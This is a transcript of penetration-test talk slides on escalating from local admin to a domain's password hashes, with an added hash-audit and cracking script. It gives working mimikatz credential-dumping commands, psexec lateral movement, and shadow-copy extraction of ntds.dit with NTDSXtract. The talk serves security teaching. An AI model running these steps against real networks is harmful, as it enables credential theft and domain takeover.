The Fall of a Domain
LOCAL ADMIN TO DOMAIN USER HASHES

Riyaz Walikar
Transcript of "Fall of a domain | From local admin to Domain user hashes"

Slide 1. The Fall of a Domain: Local Admin to Domain User Hashes
Riyaz Walikar
Slide 2. Disclaimer
- It was far more painstaking and complicated than this!
- Demo setup to show the execution path
- All the commands were actually used in the pentest
- Please do not try this on your office/corporate environment without written permission
Slide 3. Please exercise caution!
Slide 4. The story so far
- Remote RDP access to a machine on the client network via VPN
- Local Administrator rights, to simulate an employee
- The user is a limited domain user
- Domain controller on the same network, reachable, with LDAP services running
Slide 5. Visually. This.
Slide 6. Local admin, eh?
- Locally logged in as TARDIS\fwhite
- Limited domain user, but local admin
- Other users connected? [Task Manager > Users]
- Found another user connected to our system via RDP. Sweet! (possibly a domain admin)
- Need SYSTEM privileges! Any ideas?
Slide 7. Think Sysinternals!
- psexec -s -i cmd.exe
  (-s runs the process as the SYSTEM account, -i makes it interactive on the current desktop; local admin is enough to do this)
Slide 8. Dump connected user credentials
- mimikatz (Benjamin Delpy)
- Extracts plaintext passwords from memory
- Wdigest, tspkg, kerberos and many more
- mimikatz
    privilege::debug
    token::elevate
    sekurlsa::logonPasswords
Slide 9. Windows (In)Security?
Slide 10. Now what?
http://gapingvoid.com/2008/06/13/now-what/
Slide 11. Remote CMD anyone?
- RDP directly!
- Let's be discreet :)
- psexec -s -u TARDIS\atomboy \\10.10.10.1 cmd.exe
- Game already over!
- Instead, RDP with the user's credentials and present the report
Slide 12. Let's grab some hashes :)
- Active Directory stores user information in %SystemRoot%\NTDS\ntds.dit
- The file is locked (held open exclusively by the directory service) while the system is running
- ntdsutil + snapshot = backup (Windows 2008 and later)
- vssadmin create shadow /for=C: (Windows 2003 and later)
Slide 13. Let's grab some hashes :)
- The backup is readable by NT AUTHORITY\SYSTEM and Administrators
- We need the ntds.dit and SYSTEM files (the SYSTEM hive holds the boot key that encrypts the password hashes inside ntds.dit, so one is useless without the other)
- cd, dir and other built-in cmd commands do not work on an unmounted volume shadow copy
- copy works! (it accepts the \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\... device path that vssadmin prints for the new shadow copy)
Slide 14. Core files needed
Slide 15. NTDS.dit structure parse?
- NTDSXtract: a framework for offline forensic analysis of ntds.dit
- Needs the libesedb module as well
- libesedb and creddump are bundled in ntds_dump_hash.zip
- wget them to a Linux box (Kali is a good choice)
Slide 16. Get framework + compile + make + run
- wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
- wget http://ntdsxtract.com/downloads/ntds_dump_hash.zip
- unzip both
Slide 17. Get framework + compile + make + run
- cd ntds_dump_hash/libesedb
- ./configure && make
- cd esedbtools
- ./esedbexport -l /tmp/ntds.log <ntds.dit>
  (esedbexport writes the individual ESE tables, including datatable and link_table, into a <ntds.dit>.export directory next to the input file)
Slide 18. Yay!
- python ../../ntdsxtract/dsusers.py datatable link_table --passwordhashes <system_file> --passwordhistory <system_file>
  (datatable and link_table are the exported table files from the previous step; <system_file> is the SYSTEM hive copied out of the shadow copy)
- Clean up the output with ntdstopwdump.py (https://raw.github.com/inquisb/miscellaneous/master/ntdstopwdump.py), which turns it into pwdump-style user:rid:LM:NT::: lines
Slide 19. Now what?
http://gapingvoid.com/2008/06/13/now-what/
Slide 20. Pass the hash / Password cracking!
- Use the Windows Credentials Editor (Amplia Security)
- Password cracking >> Humla perhaps :)
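Slides 18 and 20 end with a pwdump-style hash list and the suggestion to crack it. The script below is an added example, not part of the original deck and not the author's or NTDSXtract's code: it parses user:rid:LM:NT::: lines, flags accounts that still have a real LM hash stored, accounts with a blank password, accounts sharing an NT hash (same password), and NT hashes that fall to a small wordlist. The sample dump and wordlist are constructed for the example (the literal hashes in it are the well-known LM and NT hashes of "password" and of the empty password). MD4 is implemented in pure Python because hashlib.md4 is often unavailable under OpenSSL 3.

```python
"""Audit a pwdump-format hash list (user:rid:LM:NT:::, the layout
ntdstopwdump.py emits) offline: stored LM hashes, blank passwords,
password reuse, and NT hashes that fall to a wordlist.

NT hash = MD4 over the UTF-16LE password. MD4 is implemented here in
pure Python because hashlib.md4 is frequently missing (OpenSSL 3 ships
MD4 only as a disabled legacy algorithm).
"""
import re
import struct

MASK = 0xFFFFFFFF
BLANK_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty password
BLANK_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
HEX32 = re.compile(r"[0-9a-f]{32}")


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _md4_round(regs, x, func, order, shifts, const):
    # 16 steps; rotating the register tuple after each step reproduces the
    # A/D/C/B register sequence of RFC 1320 without writing out 48 lines.
    a, b, c, d = regs
    for i, k in enumerate(order):
        a = _rotl((a + func(b, c, d) + x[k] + const) & MASK, shifts[i % 4])
        a, b, c, d = d, a, b, c
    return a, b, c, d


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 digest of data."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    f = lambda p, q, r: (p & q) | (~p & r)
    g = lambda p, q, r: (p & q) | (p & r) | (q & r)
    h = lambda p, q, r: p ^ q ^ r
    order2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    order3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        regs = (a, b, c, d)
        regs = _md4_round(regs, x, f, range(16), (3, 7, 11, 19), 0)
        regs = _md4_round(regs, x, g, order2, (3, 5, 9, 13), 0x5A827999)
        regs = _md4_round(regs, x, h, order3, (3, 9, 11, 15), 0x6ED9EBA1)
        a, b, c, d = [(s + t) & MASK for s, t in zip((a, b, c, d), regs)]
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash: MD4 of the UTF-16LE password, hex encoded."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(text: str):
    """Return (user, rid, lm, nt) tuples; comments and malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        rows.append((parts[0], parts[1], parts[2].lower(), parts[3].lower()))
    return rows


def audit(pwdump_text: str, wordlist):
    """Per-account findings: stored LM hash, blank password, reuse, wordlist hit."""
    # Hash the wordlist once: a domain dump has far more rows than candidates.
    lookup = {nt_hash(w): w for w in wordlist}
    rows = parse_pwdump(pwdump_text)
    users_by_nt = {}
    for user, _, _, nt in rows:
        users_by_nt.setdefault(nt, []).append(user)
    report = {}
    for user, rid, lm, nt in rows:
        report[user] = {
            "rid": rid,
            # A real LM hash means the password is at most 14 characters and
            # LM storage is still on; it cracks in minutes whatever the NT hash.
            "lm_stored": bool(HEX32.fullmatch(lm)) and lm != BLANK_LM,
            "blank": nt == BLANK_NT,
            "shared_with": [u for u in users_by_nt[nt] if u != user],
            "cracked": lookup.get(nt),
        }
    return report


# Constructed sample (not real data). The literal hashes are the well-known
# LM/NT hashes of "password"; the others are generated with nt_hash() above.
SAMPLE_DUMP = f"""\
# user:rid:LM:NT:::
Administrator:500:{BLANK_LM}:{nt_hash('correct horse battery staple')}:::
Guest:501:{BLANK_LM}:{BLANK_NT}:::
fwhite:1104:{BLANK_LM}:{nt_hash('Summer2013')}:::
atomboy:1105:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
svc_backup:1106:{BLANK_LM}:8846f7eaee8fb117ad06bdd830b7586c:::
"""
SAMPLE_WORDLIST = ["", "password", "Password1", "Welcome1", "Summer2013"]

if __name__ == "__main__":
    for user, finding in audit(SAMPLE_DUMP, SAMPLE_WORDLIST).items():
        print(user, finding)
```

On a real dump, feed the output of ntdstopwdump.py to audit() in place of SAMPLE_DUMP; the pure-Python MD4 is fine for a few thousand candidates, and anything larger belongs in John or hashcat. The "shared_with" field is worth reading first: in a domain dump, identical NT hashes mean the same password, and a service account sharing one with a user you have already cracked needs no cracking at all.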
Slide 21. References
- http://blog.gentilkiwi.com/mimikatz
- http://www.ampliasecurity.com/research/wcefaq.html
- http://bernardodamele.blogspot.in/2011/12/dumpwindows-password-hashes_16.html
Slide 22. Thank you
riyazwalikar@gmail.com
http://www.riyazwalikar.com